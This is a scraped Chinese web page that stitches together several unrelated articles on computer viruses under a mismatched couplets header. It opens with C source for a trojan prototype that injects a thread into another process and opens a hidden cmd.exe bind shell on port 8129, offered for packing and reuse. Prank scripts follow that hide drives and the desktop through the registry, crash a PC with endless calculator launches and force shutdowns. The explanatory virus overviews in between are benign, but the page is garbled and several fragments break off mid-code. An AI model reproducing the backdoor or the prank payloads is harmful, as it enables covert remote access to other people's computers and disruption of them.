【www.shanpow.com--对联大全】
【一】:病毒代码大全
制造木马病毒代码大全2008-06-08 19:46 制造木马病毒代码大全 一个简单的木马原型基础代码 添加上自己的XXX,加上变态的壳,做点小修改,就可
以..... #include #pragma comment(lib,"ws2_32.lib") #include #include #pragma comment(lib,"Shlwapi.lib") #include #include #include //参数结构 ; typedef struct _RemotePara { DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD
dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox[12]; char winsockDll[16]; char cmd[10]; char Buff[4096]; char telnetmsg[60]; }RemotePara; // 提升应用级调试权限 BOOL EnablePrivilege(HANDLE hToken,LPCTSTR
szPrivName,BOOL fEnable); // 根据进程名称得到进程ID DWORD GetPidByName(char *szName); // 远程线程执行体 DWORD __stdcall ThreadProc(RemotePara *Para)
{ WSADATA WSAData; WORD nVersion; SOCKET
listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (__stdcall *PLoadLibrary)(char*); typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall
*PGetModuleHandle)(HMODULE); FARPROC
PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile;
FARPROC PReadFile; FARPROC PCloseHandle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc =
(PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc =
(PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll); PWSAStartup = (FARPROC)Para->dwWSAStartup; PSocket =
(FARPROC)Para->dwSocket; Phtons =
(FARPROC)Para->dwhtons; Pbind =
(FARPROC)Para->dwbind; Plisten =
(FARPROC)Para->dwlisten; Paccept =
(FARPROC)Para->dwaccept; Psend =
(FARPROC)Para->dwsend; Precv =
(FARPROC)Para->dwrecv; Pclosesocket =
(FARPROC)Para->dwclosesocket; PCreateProcessA =
(FARPROC)Para->dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; PWriteFile = (FARPROC)Para->dwWriteFile; PReadFile =
(FARPROC)Para->dwReadFile; PCloseHandle =
(FARPROC)Para->dwCloseHandle; PCreatePipe =
(FARPROC)Para->dwCreatePipe; PTerminateProcess = (FARPROC)Para->dwTerminateProcess; PMessageBoxA = (FARPROC)Para->dwMessageBox; nVersion =
MAKEWORD(2,1); PWSAStartup(nVersion,
(LPWSADATA)&WSAData); listenSocket =
PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket == INVALID_SOCKET)return 0; server_addr.sin_family = AF_INET; server_addr.sin_port = Phtons((unsigned short)(8129)); server_addr.sin_addr.s_addr =
INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0; if(Plisten(listenSocket, 5))return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize); // Psend(clientSocket, Para->telnetmsg, 60, 0);
if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0; ZeroMemory(&si,sizeof(si)); //ZeroMemory 是C 运行库函数,可以直接调用 si.dwFlags =
STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow = SW_HIDE; si.hStdInput = hReadPipe2; si.hStdOutput = si.hStdError = hWritePipe1;
if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformatio n))return 0; while(1)
{ memset(Para->Buff,0,4096);
PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0); if(lBytesRead) { if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break; if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break; }else { lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0); if(lBytesRead <=0 ) break; if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break; } } PCloseHandle(hWritePipe2); PCloseHandle(hReadPipe1); PCloseHandle(hReadPipe2); PCloseHandle(hWritePipe1); Pclosesocket(listenSocket); Pclosesocket(clientSocket); // PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK); return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { const DWORD THREADSIZE=1024*4; DWORD byte_write; void *pRemoteThread; HANDLE hToken,hRemoteProcess,hThread; HINSTANCE hKernel,hUser32,hSock; RemotePara
myRemotePara,*pRemotePara; DWORD pID;
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
【二】:整人“病毒”代码(一)
发表于 2013-10-23 10:33
前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。
PS:由于精力问题没有对代码的可用性进行一一验证,所以不保证全部可用,大家如果发现有不可用的或者需要改进的地方请提出来,以下代码仅供娱乐,请勿用于非法用途。
一、怎么点都没反应的桌面
如果同事的电脑开着,他离开电脑前一会,嘿嘿,机会来了。
把他的电脑桌面按print键截屏截下来,(当然QQ截屏也可以,不过效果不太逼真!)建议大家用print截屏,设置为桌面。
然后把原来在桌面上的文件统统移到一个盘的文件夹里,这样桌面看上去和平时一个样。他回来后狂点鼠标,却怎么都没有反应!现在还在关机,开机,关机,开机,关机,开机中„„„„
附带:print键截屏方法:
键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图!
用法一,按“Print Screen SysRq”一下,对当前屏幕进行抓图,就是整个显示屏的内容。
用法二,先按住“Alt”键,再按 “Print Screen SysRq”键,则是对当前窗口进行抓图。如你打开“我的电脑”后,用此法就抓取“我的电脑”窗口的内容。
用上诉两种方法抓图后,再打开“开始”、“附件”里的“画图”程序,点“编辑”、“粘贴”就把抓取的图片贴出来了,可以保存为自己需要的格式。 哈哈,简单吧,这方法真挺搞的,有兴趣的童鞋可以试试!
二、让电脑硬盘消失-隐藏磁盘方法
愚人节电脑整人使无端端地电脑磁盘的某个分区消失了,钻进地缝里面去了吗,给外星人抓走了??非也!是某些人使坏将其隐藏起来了!
步骤
1.新建一个记事本
2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“新建文件.reg”
3.将下面的代码复制到记事本当中:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives" =hex:08,00,00,00
解释
(1)"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的
图中的D盘已经神秘消失了。
(2)A=01000000 B=02000000 C=04000000 D=08000000 E=10000000 F=20000000G=40000000 H=80000000 I=00010000 J=00020000 K=00040000 原理介绍:二进制值 “NoDrives”的缺省值均是00,00,00,00,表示不隐藏任何驱动器。键值由四个字节组成,每个字节的每一位(bit)对应从A:到Z:的一个盘,当相应位为1时,“我的电脑”中相应的驱动器就被隐藏了。第一个字节代表从A到H的8个盘,即01为A,02为B,04为C„„依次类推,第二个字节代表I到P,第三个字节代表Q到X,第四个字节代表Y和Z。比如要关闭C盘,将键值改为04,00,00,00;要关闭D盘,则改为 08,00,00,00,若要关闭C盘和D盘,则改为0C,00,00,00(C是十六进制,转成十进制就是12)。
理解了原理后,下面以笔者的电脑为例说明如何操作:笔者的电脑有一个软驱、一个硬盘(5个分区)、一个光驱,盘符分布是这样的:A:(3.5软盘)、 C:、D:、E:、F:、G:、H:(光盘),所以我的“NoDrives”值为“02ffffff”,隐藏了B、I到Z盘。
还原方法
1.点击开始--运行,如图,在运行对话框中输入“regedit”,打开注册表编辑器。
2.依次打开
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer],将右侧窗口中"NoDrives"这个子键删除。
3.重新启动电脑。
三、空空的桌面
电脑桌面是用户最熟悉不过的了,电脑整人方法电脑启动之后首先呈现的就是桌面了,如果在愚人节你把你朋友的桌面给Hack掉了话,你的朋友是不是会发疯啊?
桌面是用户操作电脑首先进入的界面,电脑桌面空空如也,一望无垠的时候,你是否很无奈?原来这一切都是它在作怪!
如图整人后桌面清清爽爽,什么都没有!
方法步骤
1. 新建一个记事本
2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“桌面.reg”
3.将下面的代码复制到记事本当中:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer]
"NoDesktop"=dword:00000001
"NoSetTaskbar"=dword:00000001
解释:(1)"NoDesktop"=dword:00000001 这个键值是屏蔽桌面的;
(2)"NoSetTaskbar"=dword:00000001这个键值是禁用“任务栏属性”功能。 将信息导入到注册表之后,桌面图标、桌面右键、桌面属性的功能都被禁用了。 还原方法:
1.点击开始--运行,如图,在运行对话框中输入“regedit”,打开注册表编辑器。
2依次打开
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer],将右侧窗口中“NoDesktop”、“NoSetTaskbar”这两个子键删除。
四、让天使替我说我爱你
CreateObject("SAPI.SpVoice").Speak"i love you"
送给你女朋友她会高兴地,保存为.vbs格式
五、打开无数个计算器
set wsh=createobject("wscript.shell")
do
wsh.run "calc"
loop
这段代码是打开无数个计算器,直到死机 ,也是保存为.vbs格式
六、你被耍了
while(1)
msgbox "哈哈 你被耍了!"
loop
这段代码就比较坏了,一直弹出窗口显示"哈哈,你被刷了!"要是你不会结束它,只好重启电脑了,也是保存为.vbs格式
七、甩不掉的魔鬼
WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"&TSName)
WScript.Echo("你是可爱的小朋吗?")
WScript.Echo("哈,我想你拉,这你都不知道吗?")
WScript.Echo("怎么才来,说~是不是不关心我")
WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。")
WScript.Echo("小强很生气,后果很严重哦。")
WScript.Echo("嘿嘿!你也会很惨滴哦")
WScript.Echo("是不是想清除我?")
WScript.Echo("那你要点上50下哦,不过会给你惊喜滴")
WScript.Echo("还剩49下,快点点哦")
WScript.Echo("还剩48下,快点,小笨蛋!")
WScript.Echo("还剩47下对,就这样快点点!")
WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。") WScript.Echo("还剩45下,记得要快哦!")
WScript.Echo("还剩43下")
WScript.Echo("还剩42下")
WScript.Echo("还剩41下")
WScript.Echo("还剩40下")
WScript.Echo("还剩39下")
WScript.Echo("还剩38下")
WScript.Echo("还剩37下")
WScript.Echo("还剩36下")
WScript.Echo("还剩35下")
WScript.Echo("还剩34下")
WScript.Echo("还剩33下")
WScript.Echo("还剩32下")
WScript.Echo("还剩30下")
WScript.Echo("还剩29下")
WScript.Echo("还剩28下")
WScript.Echo("还剩27下")
WScript.Echo("还剩26下")
WScript.Echo("还剩25下")
WScript.Echo("还剩24下")
WScript.Echo("还剩23下")
WScript.Echo("还剩22下")www.shanpow.com_病毒代码。
WScript.Echo("还剩21下")
WScript.Echo("还剩20下")
WScript.Echo("还剩19下")
WScript.Echo("还剩18下")
WScript.Echo("还剩17下")
WScript.Echo("还剩16下")
WScript.Echo("还剩15下")
WScript.Echo("还剩14下")
WScript.Echo("还剩13下停停!!!慢点,我有话要说")
WScript.Echo("还剩12下,你继续点我就会消失滴")
WScript.Echo("还剩11下,以后就看不到我拉。555555")
WScript.Echo("还剩10下,你现在可以选择停止!")
WScript.Echo("还剩9下。你还点啊,不要我拉?")
WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家")
WScript.Echo("还剩7下。疯了,你有点负意!")
WScript.Echo("还剩6下。对。你就点吧,我恨你!")
WScript.Echo("还剩5下,不明白,删除我你就好吗?")
WScript.Echo("还剩4下!真要删除我?")
WScript.Echo("还剩3下。可是我真的很眷恋你。。。")
WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你的!")
WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无义!!!")
WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
改成.vbs
八、说我是猪
on error resume next
dim WSHshellA
set WSHshellA =wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r-t 180 -c ""说我是猪,不说我是猪就一分钟关机,不信,试下···"" ",0 ,true
dim a
do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说""我是猪""
","说不说","",8000,7000)
msgboxchr(13) + chr(13) + chr(13) +a,0,"MsgBox"
loop
msgboxchr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell =wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown-a",0 ,true
msgboxchr(13) + chr(13) + chr(13) + "哈哈哈哈,好乖"
这个运行后必须输入我是猪(当然你也可以改成别的,把代码中所有的我是猪换成你想改的,
比如说我爱XXX之类的,大家懂的 ),如果一分钟没输入我是猪,就会关机.也改成.vbs
九、被鬼附身的记事本
dim sh,str,a,i
setsh=createobject("wscript.shell")
sh.run "notepad" '打开记事本
do while sh.appactivate("无标题 - 记事本")=false
wscript.sleep 1000
loop
str="wokao1!ni1youmeiyou1gaocuo1!"'这一行是演示中文输入。定义要打字的字符串。只能是英文或数字或符号。
'如果想输入中文请把下2行的注释去掉。否则就在前面加上注释符号“'”(不
【三】:常见的计算机病毒列表
电脑病毒通过病毒载体即系统的外存储器进入系统的内存储器, 常驻内存。该病毒在系统内存中监视系统的运行, 当它发现有攻击的目标存在并满足条件时, 便从内存中将自身存入被攻击的目标, 从而将病毒进行传播。以下是学习啦网小编为大家整理的关于常见计算机病毒表的相关知识,希望对大家有所帮助!
宏病毒 (Macro Virus):
宏病毒是目前最热门的话题, 它主要是利用软件本身所提供的宏能力来设计病毒, 所以凡是具有写宏能力的软件都有宏病毒存在的可能, 如Word, Excel, AmiPro都相继传出宏病毒危害的事件, 在台湾最着名的例子正是Taiwan NO.1 Word宏病毒。
引导型病毒 (Boot Strap Sector Virus):
又称开机型病毒,是藏匿和感染软盘或硬盘的第一个扇区,即平常我们所说的引导扇区(Boot Sector)。引导型病毒籍由引导动作而侵入内存,若你用已经感染的磁盘引导,那么病毒将立即感染到你的硬盘。因为DOS 的结构设计,使得引导型病毒可以于每次开机时,在操作系统还没有被载入之前就被载入到内存中,这个特性使得病毒可以针对DOS的各类中断(Interrupt)得到完全的控制,并且拥有更大的能力去进行传染与破坏。
引导型病毒又可以分为:
a、传统引导型病毒
传统引导型病毒大多由软盘传染,进入电脑后再伺机传染其它文件,最有名的例子是米开朗基罗病毒。
b、隐型引导型病毒
隐型引导型病毒感染的是硬盘的引导扇区,它伪造引导扇区的内容,使防毒软件以为系统是正常的。
c、目录型引导病毒
目录型引导病毒只感染电脑的文件分配表(FAT),一旦你的文件分配表被破坏后,你的电脑中的文件读写就会不正常,甚至丢失文件。
文件型病毒 (File Infector Virus):
文件型病毒通常寄生在可执行档(如 *.COM, *.EXE等)中。当这些文件被执行时,病毒的程序就跟着被执行。文件型的病毒依传染方式的不同,又分成非常驻型以及常驻型两种:
1)非常驻型病毒(Non-memory Resident Virus)
非常驻型病毒将自己寄生在 *.COM, *.EXE或是 *.SYS的文件中。当这些中毒的程序被执行时,就会尝试地去传染给另一个或多个文件;
2)常驻型病毒(Memory Resident Virus)
常驻型病毒躲在内存中,其行为就好像是寄生在各类的低阶功能一般(如 Interrupts),由于这个原因,常驻型病毒往往对磁碟造成更大的伤害。一旦常驻型病毒进入了内存中,只要执行档被执行,它就对其进行感染的动作,其效果非常显着。将它赶出内存的唯一方式就是冷开机(完全关掉电源之后再开机)。
3)隐型文件型病毒
它会把自己植入操作系统里面,当程序向操作系统要求中断服务时,它就会感染那个程序,而且看起来不像被感染的样子
复合型病毒 (Multi-Partite Virus):
复合型病毒兼具开机型病毒以及文件型病毒的特性。它们可以传染 *.COM, *.EXE 档,也可以传染磁碟的开机系统区(Boot Sector)。由于这个特性,使得这种病毒具有相当程度的传染力。一旦发病,其破坏的程度将会非常可观!例如:台湾曾经流行的大榔头(Hammer),欧洲流行的Flip翻转病毒皆是。
隐型飞机式病毒 (Stealth Virus):
隐型飞机式病毒又称作中断截取者(Interrupt Interceptors)。顾名思义,它藉由控制DOS的中断向量来让DOS以及防毒软件认为所有的文件都是乾净的。
千面人病毒 (Polymorphic/Mutation Virus):
千面人病毒可怕的地方,在于每当它们繁殖一次,就会以不同的病毒代码传染到别的地方去。每一个中毒的文件中,所含的病毒代码都不一样,对于扫描固定病毒代码的防毒软件来说,无疑是一个严重的考验!如Whale病毒依附于.COM档时,几乎无法找到相同的病毒代码,而Flip病毒则只有2 byte的共同病毒代码(好像戴面具只剩两个眼睛露出来).
【四】:什么是恶意代码和病毒
恶意代码危害是非常严重的,病毒危害也差不多,那么到底什么是恶意代码和病毒呢?下面由学习啦小编给你做出详细的恶意代码和病毒介绍!希望对你有帮助!
恶意代码和病毒介绍一、病毒www.shanpow.com_病毒代码。
病毒一般都具有自我复制的功能,同时,它们还可以把自己的副本分发到其他文件、程序或电脑中去。病毒一般镶嵌在主机的程序中,当被感染文件执行操作的时候,病毒就会自我繁殖(例如:打开一个文件,运行一个程序,点击邮件的附件等)。由于设计者的目的不同,病毒也拥有不同的功能,一些病毒只是用于恶作剧,而另一些则是以破坏为目的,还有一些病毒表面上看是恶作剧病毒,但实际上隐含破坏功能。病毒可以分为以下几类:感染文件病毒、感染引导区病毒、宏病毒和恶作剧电子邮件。
1. 感染文件病毒:感染文件病毒会把自己加载到可执行文件中,例如:WORD、电子表格、电脑游戏。当病毒感染了一个程序后,它就会自我复制去感染系统中的其他程序,或者是其他通过共享使用了被感染文件的系统。此外,病毒还会驻留在系统内存中,以至于一旦有新的程序运行就会被病毒感染。病毒的另一种感染方式是通过修改程序运行时所执行文件的顺序而不是修改程序运行的文件本身。在这种情况下,被感染的程序在执行的时候将先运行病毒,而后才运行自己的文件。目前,jerusalem和cascade是这类病毒中比较著名的。
2. 感染引导区病毒:感染引导区病毒可以感染硬盘或是可移动存储设备(例如软盘)的主引导区。引导区是存储器最开始的一段空间,它用来放置存储器中数据的结构定义等信息。此外,引导区中还包含引导程序,它在主机启动时运行来引导操作系统启动。主引导区是硬盘上一段独立的空间,只有用基本输入/输出系统可以定位和加载它的引导程序。当带病毒磁盘的内容在系统启动时被读取,病毒代码就会被执行;软盘等可移动存储设备即使不是启动盘,它也可以感染系统。感染引导区病毒具有极好的隐藏能力,并且可以对电脑造成极大的破坏,甚至可以达到无法恢复的地步。电脑如果感染这种病毒,一般会出现以下症状:电脑在启动时显示错误信息提示,或者是无法启动。Michelangelo和Stoned是这种病毒的典型例子。
3. 宏病毒:宏病毒是目前比较流行也是比较危险的一种病毒。宏病毒把自己加载到WORD和电子表格等文件中。这种病毒就像它的名字所说的,它是利用宏语言编写的应用程序来运行和繁殖的。目前许多受欢迎的软件(例如:Microsoft Office)都会自动利用宏语言来编译和反复执行作业。宏病毒就会利用这一点来传播恶意代码。由于用户经常把带有宏程序的文件共享,所以宏病毒的传播速度是非常快的。当宏病毒感染文件的时候,它也会把该文件用于创建和打开操作的临时文件感染。因此,被宏病毒感染的文件创建出的临时文件也是被感染的文件。Marker和Melissa是这种病毒的典型例子。
4. 恶作剧电子邮件:这种病毒就像它的名字提到的一样,是一种假冒的病毒警告。它的内容一般是恐吓用户,表示将要对用户电脑造成极大的破坏;或是欺骗用户电脑即将被病毒感染,警告他们立即采取紧急措施。尽管这种病毒发布的信息是非法的,但是它还是像真正的病毒一样传播广泛。通常这种病毒的传播是通过一些无辜的用户,他们希望发送这个信息提醒其他人防范病毒的侵袭。通常,恶作剧邮件并不会造成什么危害,但是有的恶作剧邮件会指使用户修改系统设置或是删除某些文件,这将会影响系统的安全性。阅读恶作剧邮件会浪费用户时间,而且一些恶作剧邮件会发送到一些技术支持的部门,警告他们将会有新的病毒威胁网络安全或是寻求帮助。这种病毒传播比较广泛的有Good Times和Bud Frogs。
恶意代码和病毒介绍二、特洛伊木马
这类病毒是根据古希腊神话中的木马来命名的,这种程序从表面上看没有什么,但是实际上却隐含着恶意意图。一些木马程序会通过覆盖系统中已经存在的文件的方式存在于系统之中,同时它可以携带恶意代码,还有一些木马会以一个软件的身份出现(例如:一个可供下载的游戏),但它实际上是一个窃取密码的工具。这种病毒通常不容易被发现,因为它一般是以一个正常的应用的身份在系统中运行的。特洛伊木马可以分为以下三个模式:
通常潜伏在正常的程序应用中,附带执行独立的恶意操作
通常潜伏在正常的程序应用中,但是会修改正常的应用进行恶意操作
完全覆盖正常的程序应用,执行恶意操作
大多数木马都可以使木马的控制者登录到被感染电脑上,并拥有绝大部分的管理员级控制权限。为了达到这个目的,木马一般都包括一个客户端和一个服务器端客户端放在木马控制者的电脑中,服务器端放置在被入侵电脑中,木马控制者通过客户端与被入侵电脑的服务器端建立远程连接。一旦连接建立,木马控制者就可以通过对被入侵电脑发送指令来传输和修改文件。通常木马所具备的另一个是发动DdoS(拒绝服务)攻击。
还有一些木马不具备远程登录的功能。它们中的一些的存在只是为了隐藏恶意进程的痕迹,例如使恶意进程不在进程列表中显示出来。另一些木马用于收集信息,例如被感染电脑的密码;木马还可以把收集到的密码列表发送互联网中一个指定的邮件帐户中。
恶意代码和病毒介绍三、蠕虫
是一种可以自我复制的完全独立的程序,它的传播不需要借助被感染主机中的其他程序。蠕虫的自我复制不象其他的病毒,它可以自动创建与它的功能完全相同的副本,并在没人干涉的情况下自动运行。蠕虫是通过系统存在的漏洞和设置的不安全性(例如:设置共享)来进行入侵的。它的自身特性可以使它以及快的速度传输(在几秒中内从地球的一端传送到另一端)。其中比较典型的有Blaster和SQL Slammer。
恶意代码和病毒介绍四、移动代码
移动代码是能够从主机传输到客户端计算机上并执行的代码,它通常是作为病毒,蠕虫,或是特洛伊木马的一部分被传送到客户计算机上的。另外,移动代码可以利用系统的漏洞进行入侵,例如非法的数据访问和盗取root帐号。通常用于编写移动代码的工具包括Java applets,ActiveX,JavaScript,和VBScript。
看了“什么是恶意代码和病毒”文章的还看了:
1.防止网页恶意电脑代码
2.网络病毒有哪些
3.电脑病毒和木马的概念介绍
4.国内2016年最新计算机病毒
5.到2016为止著名的计算机病毒事件
6.历史上的超强电脑病毒有哪些
【五】:bat整人电脑病毒代码是怎样的
现在流行的病毒是由人为故意编写的,多数病毒可以找到作者和产地信息,从大量的统计分析来看,病毒作者主要情况和目的是:一些天才的程序员为了表现自己和证明自己的能力,出于对上司的不满,为了好奇,为了报复,为了祝贺和求爱,为了得到控制口令,为了软件拿不到报酬预留的陷阱等.当然也有因政治,军事,宗教,民族.专利等方面的需求而专门编写的,其中也包括一些病毒研究机构和黑客的测试病毒.以下是学习啦网小编为大家整理的关于bat整人电脑病毒代码的相关知识,希望对大家有所帮助!
vbs整人代码
代码如下:
复制代码 代码如下:
Private Sub Form_Load()
Me.Hide
End Sub
Private Sub Timer1_Timer()
'声明变量,其中“count”为静态变量,以便生成不同的文件
Dim files As String
Dim nr As String
Dim c As String
Static count As Long
'定义要把生成的文件存放在那个目录文件下
c = "C:\Program Files\"
'生成文件的内容
nr = "哈哈,被黑的感觉的不错吧"
https://www.shanpow.com/dl/32075/
